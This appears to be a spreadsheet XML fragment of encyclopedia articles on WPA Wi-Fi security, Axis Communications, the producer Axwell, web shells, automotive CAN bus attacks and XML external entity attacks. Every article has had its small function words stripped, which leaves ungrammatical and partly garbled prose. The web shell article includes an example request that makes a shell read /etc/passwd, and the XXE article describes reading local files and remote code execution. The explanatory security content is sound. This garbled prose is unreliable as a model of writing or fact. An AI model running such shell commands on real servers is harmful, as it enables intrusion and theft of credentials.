july 2011</t>
  </si>
  <si>
    <t>Wi-Fi Protected Access</t>
  </si>
  <si>
    <t>wi-fi protected access (wpa), wi-fi protected access (wpa2), wi-fi protected access (wpa3) three security security certification programs developed 2000 wi-fi alliance secure wireless computer networks. alliance defined response serious weaknesses researchers found previous system, wired equivalent privacy (wep).wpa (sometimes referred tkip standard) became available 2003. wi-fi alliance intended intermediate measure anticipation availability secure complex wpa2, became available 2004 common shorthand full ieee 802.11i ieee 802.11i-2004) standard. january 2018, wi-fi alliance announced release wpa3 several security improvements wpa2. versions wi-fi alliance intended intermediate measure take place pending availability full ieee 802.11i standard. could implemented firmware upgrades wireless network interface cards designed began shipping back 1999. however, since changes required wireless access points (aps) extensive needed network cards, pre-2003 could upgraded support wpa. protocol implements temporal integrity protocol (tkip). used 64-bit 128-bit encryption must manually entered wireless access points devices change. tkip employs per-packet key, meaning dynamically generates 128-bit packet thus prevents types attacks compromised wep.wpa also includes message integrity check, designed prevent attacker altering resending data packets. this replaces cyclic redundancy check (crc) used standard. crc's main flaw provide sufficiently strong data integrity guarantee packets handled. well-tested message authentication codes existed solve problems, required much computation used network cards. uses message integrity check algorithm called tkip verify integrity packets. tkip much stronger crc, strong algorithm used wpa2. researchers since discovered flaw relied older weaknesses limitations message integrity code hash function, named michael, retrieve keystream short packets re-injection spoofing. wpa2 ratified 2004, wpa2 replaced wpa. wpa2, requires testing certification wi-fi alliance, implements mandatory elements ieee 802.11i. particular, includes mandatory support ccmp, aes-based encryption mode. certification began september, 2004. from march 2006, june 2020, wpa2 certification mandatory devices bear wi-fi trademark. wpa3 january 2018, wi-fi alliance announced wpa3 replacement wpa2. certification began june 2018.the standard uses equivalent 192-bit cryptographic strength wpa3-enterprise mode (aes-256 mode sha-384 hmac), still mandates ccmp-128 (aes-128 mode) minimum encryption algorithm wpa3-personal mode. wpa3 standard also replaces pre-shared (psk) exchange simultaneous authentication equals (sae) exchange, method originally introduced ieee 802.11s, resulting secure initial exchange personal mode forward secrecy. wi-fi alliance also claims wpa3 mitigate security issues posed weak passwords simplify process setting devices display interface.protection management frames specified ieee 802.11w amendment also enforced wpa3 specifications. hardware support designed specifically work wireless hardware produced prior introduction protocol, provides inadequate security wep. some devices support applying firmware upgrades, available legacy devices.wi-fi devices certified since 2006 support wpa2 security protocols. wpa3 required since july 2020. terminology different versions protection mechanisms distinguished based target end-user (according method authentication distribution), encryption protocol used. target users (authentication distribution) wpa-personal also referred wpa-psk (pre-shared key) mode, designed home small office networks require authentication server. each wireless network device encrypts network traffic deriving 128-bit encryption 256-bit shared key. this entered either string hexadecimal digits, passphrase printable ascii characters. this pass-phrase-to-psk mapping nevertheless binding, annex informative latest 802.11 standard. ascii characters used, 256-bit calculated applying pbkdf2 derivation function passphrase, using ssid salt 4096 iterations hmac-sha1. wpa-personal mode available three versions. wpa-enterprise also referred wpa-802.1x mode, sometimes opposed wpa-psk), designed enterprise networks requires radius authentication server. this requires complicated setup, provides additional security (e.g. protection dictionary attacks short passwords). various kinds extensible authentication protocol (eap) used authentication. wpa-enterprise mode available three versions. wi-fi protected setup (wps) this alternative authentication distribution method intended simplify strengthen process, which, widely implemented, creates major security hole recovery. encryption protocol tkip (temporal integrity protocol) stream cipher used 128-bit per-packet key, meaning dynamically generates packet. this used wpa. ccmp (ctr mode cbc-mac protocol) protocol used wpa2, based advanced encryption standard (aes) cipher along strong message authenticity integrity checking significantly stronger protection privacy integrity rc4-based tkip used wpa. among informal names "aes" "aes-ccmp". according 802.11n specification, encryption protocol must used achieve fast 802.11n high bitrate schemes, though implementations enforce this. otherwise, data rate exceed mbit/s. extensions wpa2 enterprise originally, eap-tls (extensible authentication protocol transport layer security) certified wi-fi alliance. april 2010, wi-fi alliance announced inclusion additional types wpa- wpa2-enterprise certification programs. this ensure wpa-enterprise certified products interoperate another. 2010 certification program includes following types: eap-tls (previously tested) eap-ttls/mschapv2 (april 2005) peapv0/eap-mschapv2 (april 2005) peapv1/eap-gtc (april 2005) peap-tls eap-sim (april 2005) eap-aka (april 2009) eap-fast (april 2009)802.1x clients servers developed specific firms support types. this certification attempt popular types interoperate; failure 2013 major issues preventing rollout 802.1x heterogeneous networks. commercial 802.1x servers include microsoft internet authentication service juniper networks steelbelted radius well aradial radius server. freeradius open source 802.1x server. security issues weak password pre-shared wpa2 remain vulnerable password cracking attacks users rely weak password passphrase. passphrase hashes seeded ssid name length; rainbow tables exist 1,000 network ssids multitude common passwords, requiring quick lookup speed cracking wpa-psk.brute forcing simple passwords attempted using aircrack suite starting four-way authentication handshake exchanged association periodic re-authentication.wpa3 replaces cryptographic protocols susceptible off-line analysis protocols require interaction infrastructure guessed password, supposedly placing temporal limits number guesses. however, design flaws wpa3 enable attackers plausibly launch brute-force attacks (see dragonblood attack). lack forward secrecy wpa2 provide forward secrecy, meaning adverse person discovers pre-shared key, potentially decrypt packets encrypted using transmitted future even past, could passively silently collected attacker. this also means attacker silently capture decrypt others' packets wpa-protected access point provided free charge public place, password usually shared anyone place. words, protects attackers access password. because that, safer transport layer security (tls) similar transfer sensitive data. however starting wpa3, issue addressed. packet spoofing decryption mathy vanhoef frank piessens significantly improved upon wpa-tkip attacks erik tews martin beck. they demonstrated inject arbitrary number packets, packet containing bytes payload. this demonstrated implementing port scanner, executed client using wpa-tkip. additionally showed decrypt arbitrary packets sent client. they mentioned used hijack connection, allowing attacker inject malicious javascript victim visits website. contrast, beck-tews attack could decrypt short packets mostly known content, messages, allowed injection packets bytes. beck-tews attack also requires quality service defined 802.11e) enabled, vanhoef-piessens attack not. neither attack leads recovery shared session client access point. authors using short rekeying interval prevent attacks all, strongly recommend switching tkip aes-based ccmp. halvorsen others show modify beck-tews attack allow injection packets size bytes. downside attack requires substantially time execute: approximately minutes seconds. work vanhoef piessens showed that, used encrypt broadcast packets, original attack also executed. this important extension, substantially networks protect broadcast packets, protect unicast packets. execution time attack average around minutes, compared minutes original vanhoef-piessens beck-tews attack. vulnerabilities tkip significant wpa-tkip held extremely safe combination; indeed, wpa-tkip still configuration option upon wide variety wireless routing devices provided many hardware vendors. survey 2013 showed still allow usage tkip, exclusively support tkip. recovery serious security flaw revealed december 2011 stefan viehböck affects wireless routers wi-fi protected setup (wps) feature, regardless encryption method use. most recent models feature enable default. many consumer wi-fi device manufacturers taken steps eliminate potential weak passphrase choices promoting alternative methods automatically generating distributing strong keys users wireless adapter appliance network. these methods include pushing buttons devices entering 8-digit pin. wi-fi alliance standardized methods wi-fi protected setup; however, feature widely implemented introduced major security flaw. flaw allows remote attacker recover and, router's wpa/wpa2 password hours. users urged turn feature, although possible router models. also, written label wi-fi routers wps, cannot changed compromised. wpa3 introduces alternative configuration devices lack sufficient user interface capabilities allowing nearby devices serve adequate network provisioning purposes, thus mitigating need wps. ms-chapv2 lack server validation several weaknesses found ms-chapv2, severely reduce complexity brute-force attacks, making feasible modern hardware. 2012 complexity breaking ms-chapv2 reduced breaking single key, work moxie marlinspike marsh ray. moxie advised: "enterprises depending mutual authentication properties ms-chapv2 connection wpa2 radius servers immediately start migrating something else."tunneled methods using ttls peap encrypt mschapv2 exchange widely deployed protect exploitation vulnerability. however, prevalent wpa2 client implementations early 2000s prone misconfiguration users, cases (e.g. android), lacked user-accessible properly configure validation server certificate cns. this extended relevance original weakness mschapv2 within mitm attack scenarios. under stricter wpa2 compliance tests announced alongside wpa3, certified client software required conform certain behaviors surrounding certificate validation. hole196 hole196 vulnerability wpa2 protocol abuses shared group temporal (gtk). used conduct man-in-the-middle denial-of-service attacks. however, assumes attacker already authenticated access point thus possession gtk. predictable group temporal (gtk) 2016 shown wpa2 standards contain insecure expository random number generator (rng). researchers showed that, vendors implement proposed rng, attacker able predict group (gtk) supposed randomly generated access point (ap). additionally, showed possession enables attacker inject traffic network, allowed attacker decrypt unicast internet traffic transmitted wireless network. they demonstrated attack asus rt-ac51u router uses mediatek out-of-tree drivers, generate themselves, showed recovered within minutes less. similarly, demonstrated keys generated broadcom access daemons running vxworks later recovered four minutes less, affects, example, certain versions linksys wrt54g certain apple airport extreme models. vendors defend attack using secure rng. hostapd running linux kernels vulnerable attack thus routers running typical openwrt lede installations exhibit issue. krack attack october 2017, details krack (key reinstallation attack) attack wpa2 published. krack attack believed affect variants wpa2; however, security implications vary implementations, depending upon individual developers interpreted poorly specified part standard. software patches resolve vulnerability available devices. dragonblood attack april 2019, serious design flaws wpa3 found allow attackers perform downgrade attacks side-channel attacks, enabling brute-forcing passphrase, well launching denial-of-service attacks wi-fi base stations. references external links official standards document: ieee 802.11i-2004 (pdf). ieee (the institute electrical electronics engineers, inc.). july 2004. isbn 0-7381-4074-0. wi-fi curlie wi-fi alliance's interoperability certificate page weakness passphrase choice interface, robert moskowitz. retrieved march 2004. evolution 802.11 wireless security, kevin benton, april 18th 2010 archived 2016-03-02 wayback machine</t>
  </si>
  <si>
    <t>Axis Communications</t>
  </si>
  <si>
    <t>axis communications swedish manufacturer network cameras, access control, network audio devices physical security video surveillance industries. history axis communications founded 1984 martin gren, mikael karlsson keith bloodworth lund, sweden. company developed sold protocol converters printer interfaces connection printers mainframe mini-computer environments. 1980s, axis communications opened first u.s. sales office boston, massachusetts early 1990s started shifting focus away mainframes towards networking tcp/ip protocol. 1991, axis communications introduced multi-protocol print server supporting tcp/ip netware. 1993, company developed architecture, etrax cris, microprocessors used embedded devices. 1995, company introduced file server independent, multi-protocol cd-rom server, supporting tcp/ip (nfs) windows (smb), ethernet networks, axis 850. 1995, axis communications opened sales offices hong kong, singapore, tokyo, japan. 1996, axis communications introduced industry's first network camera, axis 200. this followed 1999 axis 2100 first volume product using embedded linux. 2003, company introduced axis 205, smallest network camera. 2008, axis communications announced together bosch sony companies cooperate order standardize interface network video products form industry standards body called onvif (open network video interface forum).on february 2015, japanese multinational corporation canon inc., specializes manufacture imaging optical products, announced cash 23.6 billion swedish kronor (us$2.83 billion) acquire axis communications. while canon majority shareholder, axis independently. canon's network cameras sold supported axis communications emea (europe, middle east africa) region north america since september 2016 october 2016, respectively. november 2018, axis communications delisted nasdaq stockholm.on february 2016, axis communications acquired citilog, video analytics provider traffic transportation security safety applications. april 2021, axis communications announced selling citilog, citing challenges finding "desired synergies different go-to-market models." axis communications acquired provider intercom systems based czech republic. june 2016, axis communications acquired cognimatics, video analytics provider retail applications people counting, queue measurement occupancy estimation.in 2018, axis opened office software development linköping, sweden. operations axis communications operates offices countries employs 3,800 people.installations include city houston, sydney airport, moscow metro, white house madrid buses.in 2019, axis communications published sustainability report stating percent network cameras video encoders pvc-free. technology products network cameras axis communications develops sells network cameras many applications. products include ptz, vandal resistant, thermal, nitrogen-pressurized, wireless cameras. introduced industry's first thermal network camera, axis q1910 january 2010 industry's first hdtv network camera, axis q1755 december 2008. march 2022, company released axis m5000-g connect z-wave devices cover indoor area most cameras video content analysis capabilities advance motion detection. certain network cameras support advanced video content analysis detect objects human behavior. body cameras march 2020, axis communications entered body market open architecture system competing market incumbents axon, digital ally, wolfcom motorola solutions watchguard video brand. video encoders axis communications develops sells video encoders allowing video analog systems converted digital format networks. recent models based h.264 video compression standard lower bandwidth storage requirements without impacting image quality. company sells 1-port, 4-port, 6-port 16-port video encoders well rack-mountable systems large installations. video management software axis communications sells full-featured video management software markets name axis camera station. software provides remote video monitoring, recording event management functionality. allows integration systems point sale access control. axis sells light-weight remote-viewing application name axis companion. physical access control axis communications started offering physical access control systems late 2013. first product axis a1001 network door controller. open interface integration ip-based security system components third-party software. axis a1001 network door controller first onvif conformant physical access control system available market. network audio march 2015, axis communications introduced first network audio product, horn speaker providing talk-down audio functionality security applications. september 2016, introduced network audio loudspeakers background music live scheduled announcements retail stores. september 2017, axis communications expanded network audio offering analog audio converter system. 2022, axis communications released first network strobe siren provides audible visual alerts. radar 2017, axis communications introduced first radar, axis d2050-ve, allowed minimization false alarms, analytics, classification objects, auto-tracking capabilities axis cameras. 2019 axis introduced axis d2110-ve radar machine learning deep learning capabilities. microprocessors artpec (axis real time picture encoder chip) system chip (soc) developed axis communications. there currently generations chip. chips axis modified version linux designed embedded devices. products developed axis communications custom chip. chip typically found high performance devices higher cameras lower cost devices soc's ambarella.the artpec-1 asic first asic designed in-house axis communications network video. initial development began 1996 order support hardware compression encoding video. time processors available network video. it's internal firmware based embedded operating system called μclinux became known embedded linux. artpec-2 released 2003, based etrax cris architecture. unlike artpec-1 relies external cpu, artpec-2 internal etrax improves power efficiency performance. additionally, mpeg-4 encoder decoder reduces bandwidth streaming recording video. artpec-3 released 2007, based etrax cris architecture. this first developed axis supports h.264 standard video encoding. image processing pipeline capable capturing 1080p video source frames second. artpec-4 released 2011, single core mips (1004kc). image processing pipeline based etrax cris. lightfinder, technology allows camera color challenging light conditions p-iris reduces lens refraction. artpec-5 released 2013, dual core mips (1004kf) dual hardware threads support symmetric multiprocessing. image processing pipeline based etrax cris. chip actively increases forensic details scene technology called forensic capture lowers bandwidth preserving forensic details image technology called zipstream. artpec-6 released 2016, powered cortex-a9 cpu. image processing pipeline based etrax cris. capable capturing video frames second. chip actively increases forensic details scene technology called forensic runs video analytics.the artpec-7 released 2019, powered cortex-a9 cpu. image processing pipeline based etrax cris. this first developed axis supports h.265 standard video encoding. artpec-7 features secure boot prevents booting unauthorized firmware, improvements light imaging lightfinder 2.0, machine learning processor.the artpec-8 released 2021, powered cortex-a53 cpu. similar predecessor using image processing pipeline, video encoders, security features. primarily focused machine learning video analytics, processor features deep learning processor. cybersecurity vulnerabilities october 2021, cybersecurity research firm nozomi networks published "three vulnerabilities (cve-2021-31986, cve-2021-31987, cve-2021-31988) affecting axis devices based embedded axis os." axis nozomi collaborated throughout research disclosure process, nozomi publishing statement axis announcement vulnerability.in order execute said exploits, potential adversary needs network access administrator level access axis device. week discoveries, cve-2021-31986, cve-2021-31987, cve-31998 patched axis 10.7, axis 2016 track 6.50.5.5, axis 2018 track 8.40.4.3, axis 2020 track 9.80.3.5. thank nozomi networks research good collaboration throughout disclosure process. axis communications welcomes researchers inspect devices firmware belief long-term sustainable cyber security created collaboration transparency. also video surveillance megapixel image sensor professional video closed-circuit television (cctv) closed-circuit television camera video analytics onvif physical security references further reading "axis introduces camera based lightfinder technology". security today. 2011-05-19. retrieved 2017-11-27.{{cite news}}: maint: url-status (link) "aimetis symphony first analytics support axis' corridor format". security today. 2011-01-24. retrieved 2014-12-10.{{cite news}}: maint: url-status (link) "axis unveils corridor format". security today. 2010-10-13. retrieved 2017-11-22.{{cite news}}: maint: url-status (link)</t>
  </si>
  <si>
    <t>Axwell</t>
  </si>
  <si>
    <t>axel christofer hedfors (swedish pronunciation: [ˈǎksɛl krɪsˈtɔfɛr hɛː(d)ˈfɔʂː]; born december 1977), better known stage name axwell, swedish record producer, remixer owner axtone records. member swedish house mafia along sebastian ingrosso steve angello. two-time awards winner, 2013 placed 19th magazine poll. remains third-most dj-supported producer world consecutive years 1001tracklists producers rankings. early life axwell's interest music appeared early age, taught play drums nine. four years later, 13-year-old exchanged drums computer could create element music independently. teenage years attended fäladsgården elementary school, still talked day. axwell released limited copies techno/hard trance vinyl name 1995. during teenage years, also active tracking music scene moniker quazar, releasing acid techno tracks made fasttracker noisetracker. musical career 1995–2003: career beginnings axwell began career remixing songs artists, first official remix released 2000. some notable early remixes include: usher's "burn" (bmg), room "make luv" (positiva), clipse faith evans "ma, don’t love her" (rca), stonebridge's "put high" (hed kandi), n*e*r*d's single "maybe" (virgin), recently hard-fi's "hard beat", deep dish's "dreams", pharrell's "angel", nelly furtado's "promiscuous" madonna's "jump". axwell also responsible jetlag's right", came september 2002 soulfuric, featuring vocals noel mckoy co-produced brian tappert. late 2002 axwell went back roots produced track name "lead guitar" released fellow swede stonebridge stoney imprint. also leading mambana, collaboration isabel fructuoso afro medusa fame). signed soulfuric recordings, released three tracks since 2002. reason" debut single, spot hype/buzz charts summer featured sets including little louie vega, danny rampling watt. follow "felicidad" "libre". "libre" released 2003 arguably bigger predecessor. "libre" licensed different territories featured compilations sold excess half million copies. 2003 axwell recording london-based label susu (the home masters work) guise starbeach. track called "get naked" featured vocal talents d'empress (from mutiny). this followed version evelyn thomas' classic "high energy". autumn 2003 axwell's "wait minute", featuring vocals nevada, released soulfuric's sub-label device. this song club smash gained support likes pete tong, junior jack, creme. 2004–2007: singles breakthrough late 2004, axwell released "feel vibe", re-released ministry sound 2005 lead vocals tara mcdonald also wrote song "feel vibe ('til morning comes)". mcdonald's voice writing helped secure track radio winner track became biggest cross dance records 2005. breakthrough record axwell tara mcdonald. peaked dance singles chart singles chart. addition re-release "feel vibe" ministry sound, produced several club remixes, well productions, including "get over here" rasmus faber, million ways" c-mos, "turn music" roger sanchez, well collaboration sebastian ingrosso ernesto bastian's "dark side moon". alongside original productions, collaborated swedish producer ingrosso "together". axwell's successful release 2005 "watch sunrise", steve edwards vocals (famous cassius' "the sound violence"). track reached dance singles chart radio dance chart. axwell's productions also found time create axtone, record label. spring 2006, axwell steve angello, supermode alias, remixed bronski beat's "smalltown boy", producing "tell why" released data label. later, teamed eric prydz produced tracks releasing alias axer. october axwell make entry number that year, axwell branched york house sound "counting down days", song sunfreakz. axwell ignored vocals (sung andrea britton) mix, blend cutting progressive-house sounds ethereal keyboards. israeli offer nissim featured prominently march 2007 closing party manhattan's roxy. august 2007, axwell teamed performer max'c create track found made singles chart. 2007 polls axwell climb places number 2008–2013: swedish house mafia 2007–2008: group formation, continued solo work august 2007, axwell, steve angello sebastian ingrosso played main room cream amnesia alias swedish house mafia part radio essential ibiza. group officially formed late 2008 performing shows like time along fellow swedish eric prydz however prydz decided join group, describing 'control freak' studio can't abide collaboration, even close friends. 2007, trio released first single together, "get dumb", however credited individual names. 2008, axwell co-wrote co-produced song "rain cyndi lauper 2008 album bring brink. during june year released song originally produced remix david guetta's "everytime touch". somehow, guetta rejected remix axwell took instrumental song, teamed sinclar brought vocalist carroll together created "what wonderful world". august, axwell collaborated australian producer, dirty south, released "open your heart". time, also remixed "hometown glory" adele. remix released versions, "original mix" vocals club oriented "remode". october axwell climb poll positions number 2009–2010: until one, axtone vol.1 2009, axwell released "leave world behind" swedish house mafia. song featured vocal deborah credited group's individual names. 2009, axwell chart number poll. 2010 swedish house mafia release first singles credited such. singles, "one (your name)" (featuring pharrell williams) "miami ibiza" (featuring tinie tempah), commercial successes becoming many european countries. these songs featured swedish house mafia's debut album until (released october 2010) acted studio compilation album contained much work group individually) well work producers well. june 2010, axwell released studio/compilation album entitled axtone vol.1. 2010, axwell achieved highest position poll, charting number 2011–2012: until now, grammy awards, album production february 2011, axwell dirty south's remix song "sweet disposition" originally temper trap, received nomination 53rd grammy awards category best remixed recording, non-classical. meanwhile, may, released "save world" rest swedish house mafia. song featured vocals swedish singer john martin gained certifications across europe including platinum sweden. polls axwell chart number year. towards year beginning 2012, axwell continue work swedish house mafia releasing singles "antidote" "greyhound". also worked rida american's fourth studio album wild ones, co-producing successful singles "wild ones" "let roll". april 2012, axwell released remix mind" ivan gough feenixpawl featuring georgi beatport. nominated 55th grammy awards category best remixed recording, non-classical. june, release usher's looking myself second album axwell co-produced songs "numb" "euphoria" latter receiving remix entire swedish house mafia. september, swedish house mafia released commercially successful song featured vocals john martin. "don't worry child" became many countries gaining muti-platinum awards many also. this along previous solo group work swedish house mafia members featured trio's second final album until released october 2012. 2013: last tour continued solo work november 2012, swedish house mafia kicked last tour announcement june year. supergroup stated final tour would last group would split conclusion ultra music festival miami 2013. following group's farewell, axwell fellow swedish house mafia member sebastian ingrosso announced night club ushuaïa, ibiza, called "departures". 2013 axwell's single "center universe" released digital download song reaching number beatport. subsequent single, sick individuals feat taylr renee, released september also reached number beatport. remixes released january 2014 axwell's axtone label. remixing artists included deorro, dimitri vegas like mike, jacob plant nu:tone. 2013 axwell climb positions poll first time since 2010. climbed places 2012 position achieve place 2013 also axwell collaborate sebastian ingrosso "roar" monsters university soundtrack. 2014–present: axwell ingrosso 2014: governors ball axwell joined forces sebastian ingrosso, debuting collective 2014 governors ball music festival york city group named axwell ingrosso, followed release debut songs come, rave, love", final version song started swedish house mafia played frequently last tour. single, "something new" released november year. 2015–2017: single releases solo work early months 2015 axwell released second third single axwell ingrosso collaboration entitled way" "can't hold down" respectively. june, released fourth single named "sun shining". this song became number sweden axwell's (and ingrosso's) first number since "don't worry child". july headlined tomorrowland closing night two.in november 2015, "this time" released axwell ingrosso "dream bigger" year's eve, axwell also released first solo single since formation group entitled "waiting long". 2016 axwell continue release music solo artist well adding vocals pharrell williams "dream bigger". solo releases included singles "barricade" "belong". latter received remix later year, first later feature duo's debut album, more than know. 2016 also axwell remix ingrosso's track "dark river". 2016 released seventh single "thinking about you" eighth following february 2017 entitled love you" featured vocals ink. 2017: more than know early 2017, axwell released first single second sebastian ingrosso collective entitled "renegade" title song, "more than know", released latter parts month. song commercial success, becoming chart gaining certifications many countries. july, axwell perform tomorrowland axwell ingrosso headliners event. october 2017 axwell release long-awaited remix pauls paris's 2013 song "make your mind", december 2017, duo's debut album, more than know, released. album contained previously released music single "dreamer". 2018-present: swedish house mafia reunion axwell ingrosso hiatus final weekend march 2018, axwell performed ultra miami 2018 axwell ingrosso. festival also axwell perform swedish house mafia group reunited five-year hiatus festival's 20th anniversary. june, axwell ingrosso released first single since debut studio album, more than know, featuring british singer rømans called "dancing alone". month later performed tomorrowland 2018, paid tribute late avicii part set. august 2018, axwell ingrosso announced would going hiatus order focus swedish house mafia reunion 2019 tour. june 2019, axwell announced record label, axtone records, would launch axtone academy, music academy would pair aspiring producers label's veterans help young musicians music industry. axwell cancelled solo performance electric love festival catering ‘unforeseen circumstances' communicated axwell's management team. discography awards nominations also list number dance hits (united states) list artists reached number dance chart swedish popular music references external links official website axwell discography discogs axwell's forum everything wanna know axwell, axtone axwell live antwerp amsterdam 2012</t>
  </si>
  <si>
    <t>B374k</t>
  </si>
  <si>
    <t>shell shell-like interface enables server remotely accessed, often purposes cyberattacks. shell unique browser used interact it.a shell could programmed programming language supported server. shells commonly written programming language widespread usage applications. however, active server pages, asp.net, python, perl, ruby, unix shell scripts also used, although languages less commonly used.using network monitoring tools, attacker find vulnerabilities potentially allow delivery shell. these vulnerabilities often present applications server.an attacker shell issue shell commands, perform privilege escalation server, ability upload, delete, download, execute files server. general usage shells used attacks mostly multi-purpose difficult detect.web shells commonly used for: data theft infecting website visitors (watering hole attacks) website defacement modifying files malicious intent launch distributed denial-of-service (ddos) attacks relay commands inside network inaccessible internet command control base, example botnet system compromise security additional external networks. delivery shells shells installed vulnerabilities application weak server security configuration including following: injection; vulnerabilities applications services (e.g. server software nginx content management system applications wordpress); file processing uploading vulnerabilities, mitigated e.g. limiting file types uploaded; remote file inclusion (rfi) local file inclusion (lfi) vulnerabilities; remote code execution; exposed administration interfaces;an attacker also modify (spoof) content-type header sent attacker file upload bypass improper file validation (validation using mime type sent client), result successful upload attacker's shell. example following simple example shell written executes outputs result shell command: assuming filename example.php, example would output contents /etc/passwd file shown below: https://example.com/example.php?x=cat%20%2fetc%2fpasswd request take value parameter query string, sending following shell command: this could prevented shell functions disabled arbitrary shell commands cannot executed php. prevention mitigation shell usually installed taking advantage vulnerabilities present server's software. that removal vulnerabilities important avoid potential risk compromised server. following security measures preventing installation shell: regularly update applications host server's operating system ensure immunity known bugs deploying demilitarized zone (dmz) facing servers internal networks secure configuration server closing blocking ports services used using user input data validation limit local remote file inclusion vulnerabilities reverse proxy service restrict administrative url's known legitimate ones frequent vulnerability scan detect areas risk conduct regular scans using security software (this prevent zero attacks) deploy firewall disable directory browsing using default passwords detection shells easily modified, easy detect shells antivirus software often able detect shells.the following common indicators shell present server: abnormal high server usage (due heavy downloading uploading attacker); files abnormal timestamp (e.g. newer last modification date); unknown files server; files dubious references, example, cmd.exe eval; unknown connections logs serverfor example, file generating suspicious traffic (e.g. file requesting post parameters); dubious logins servers internal sub-nets vice versa.web shells also contain login form, often disguised error page.using shells, adversaries modify .htaccess file servers running apache http server software) servers redirect search engine requests page malware spam. often shells detect user-agent content presented search engine spider different presented user's browser. find shell user-agent change crawler usually required. once shell identified, deleted easily.analyzing server's could specify exact location shell. legitimate users/visitor usually different user-agents referers (referrers), hand, shell usually visited attacker, therefore variants user-agent strings. also backdoor (computing) cyberwarfare internet security network security china chopper references</t>
  </si>
  <si>
    <t>Automotive security</t>
  </si>
  <si>
    <t>automotive security refers branch computer security focused cyber risks related automotive context. increasingly high number ecus vehicles and, alongside, implementation multiple different means communication towards vehicle remote wireless manner necessity branch cybersecurity dedicated threats associated vehicles. confused automotive safety. causes implementation multiple ecus (electronic control units) inside vehicles began early '70s thanks development integrated circuits microprocessors made economically feasible produce ecus large scale. since number ecus increased vehicle. these units nowadays control almost everything vehicle, simple tasks activating wipers safety-related ones like brake-by-wire (anti-lock braking system). autonomous driving also strongly reliant implementation new, complex ecus adas, alongside sensors (lidars radars) control units. inside vehicle, ecus connected cabled wireless communication networks, (controller area network), most (media oriented system transport), flexray (automotive network communications protocol) (radio frequency) many implementations tpmss (tire pressure monitoring systems). important notice many ecus require data received networks arrive various sensors operate data modify behavior vehicle (e.g., cruise control modifies vehicle's speed depending signals arriving button usually located steering wheel). since development cheap wireless communication technologies bluetooth, lte, wi-fi, rfid similar, automotive producers oems designed ecus implement technologies goal improving experience driver passengers. safety-related systems onstar general motors, telematic units, communication smartphones vehicle's speakers bluetooth, android auto apple carplay. threat model threat models automotive world based real-world theoretically possible attacks. most real-world attacks safety people around car, modifying cyber-physical capabilities vehicle (e.g., steering, braking, accelerating without requiring actions driver), theoretical attacks supposed focus also privacy-related goals, obtaining data vehicle, capturing microphone signals similar.regarding attack surfaces vehicle, usually divided long-range, short-range, local attack surfaces: dsrc considered long-range ones, bluetooth wi-fi usually considered short-range although still wireless. finally, usb, obd-ii attack surfaces require physical access defined local. attacker able implement attack long-range surface considered stronger dangerous requires physical access vehicle. 2015 possibility attacks vehicles already market proven possible miller valasek, managed disrupt driving jeep cherokee remotely connecting remote wireless communication. controller area network attacks common network used vehicles mainly used safety-related communication can, real-time properties, simplicity, cheapness. reason majority real-world attacks implemented ecus connected type network.the majority attacks demonstrated either actual vehicles testbeds fall following categories: sniffing sniffing computer security field generally refers possibility intercepting logging packets generally data network. case can, since network, every node listens communication network. useful attacker read data learn behavior nodes network implementing actual attack. usually, final goal attacker simply sniff data can, since packets passing type network usually valuable read. denial service denial service (dos) information security usually described attack objective making machine network unavailable. attacks ecus connected buses done network, abusing arbitration protocol used always arbitration, targeting single ecu, abusing error handling protocol can. second case attacker flags messages victim faulty convince victim broken therefore shut network. spoofing spoofing attacks comprise cases attacker, falsifying data, sends messages pretending another node network. automotive security usually spoofing attacks divided masquerade replay attacks. replay attacks defined attacker pretends victim sends sniffed data victim sent previous iteration authentication. masquerade attacks are, contrary, spoofing attacks data payload created attacker. real life automotive threat example security researchers charlie miller chris valasek successfully demonstrated remote access wide variety vehicle controls using jeep cherokee target. they able control radio, environmental controls, windshield wipers, certain engine brake functions.the method used hack system implementation pre-programmed chip controller area network (can) bus. inserting chip bus, able send arbitrary message bus. thing miller pointed danger bus, broadcasts signal message caught hackers throughout network. control vehicle done remotely, manipulating system without physical interaction. miller states could control million vehicles united states regardless location distance, thing needed someone turn vehicle gain access. security measures increasing complexity devices networks automotive context requires application security measures limit capabilities potential attacker. since early 2000 many different countermeasures proposed and, cases, applied. following, list common security measures: sub-networks: limit attacker capabilities even he/she manages access vehicle remote remotely connected ecu, networks vehicle divided multiple sub-networks, critical ecus placed sub-networks ecus accessed remote. gateways: sub-networks divided secure gateways firewalls block messages crossing sub-network intended intrusion detection systems (ids): critical sub-network, nodes (ecus) connected goal reading data passing sub-network detect messages that, given rules, considered malicious (made attacker). arbitrary messages caught passenger using notify owner regarding unexpected message. authentication protocols: order implement authentication networks already implemented (such can), possible design authentication protocol works higher layers model, using part data payload message authenticate message itself. hardware security modules: since many ecus powerful enough keep real-time delays executing encryption decryption routines, network possible place hardware security module manages security legislation june 2020, united nations economic commission europe (unece) world forum harmonization vehicle regulations released regulations, r155 r156, establishing "clear performance audit requirements manufacturers" terms automotive cybersecurity software updates. notes</t>
  </si>
  <si>
    <t>XML external entity attack</t>
  </si>
  <si>
    <t>external entity attack (xxe attack) type attack application parses input. this attack occurs input containing reference external entity processed weakly configured parser. this attack lead disclosure confidential data, denial service (dos), server side request forgery, port scanning perspective machine parser located, system impacts. description standard defines structure document. standard defines concept called entity, term refers multiple types storage unit. types entities external general/parameter parsed entity, often shortened external entity, access local remote content declared system identifier. system identifier assumed dereferenced (accessed) processor processing entity. processor replaces occurrences named external entity contents dereferenced system identifier. system identifier contains tainted data processor dereferences tainted data, processor disclose confidential information normally accessible application. similar attack vectors apply usage external dtds, external style sheets, external schemas, etc. which, included, allow similar external resource inclusion style attacks. attacks include disclosing local files, contain sensitive data passwords private user data, using file: schemes relative paths system identifier. since attack occurs relative application processing document, attacker trusted application pivot internal systems, possibly disclosing internal content http(s) requests launching csrf attack unprotected internal services. situations, processor library vulnerable client-side memory corruption issues exploited dereferencing malicious uri, possibly allowing arbitrary code execution application account. other attacks access local resources stop returning data, possibly impacting application availability many threads processes released. application need explicitly return response attacker vulnerable information disclosures. attacker leverage information exfiltrate data subdomain names server control. risk factors application parses documents. tainted data allowed within system identifier portion entity, within document type definition (dtd). processor configured validate process dtd. processor configured resolve external entities within dtd. examples examples testing injection (owasp-dv-008). accessing local resource return remote code execution when "expect" module loaded, remote code execution possible modified payload. disclosing /etc/passwd targeted files mitigation since entire document communicated untrusted client, usually possible selectively validate escape tainted data within system identifier dtd. processor could configured local static disallow declared included document. also injection blind injection references external links owasp external entity (xxe) prevention cheat sheet timothy morgan's 2014 paper: schema, dtd, entity attacks compendium known techniques precursor presentation paper owasp appsec 2013 cwe-611: information exposure through external entity reference 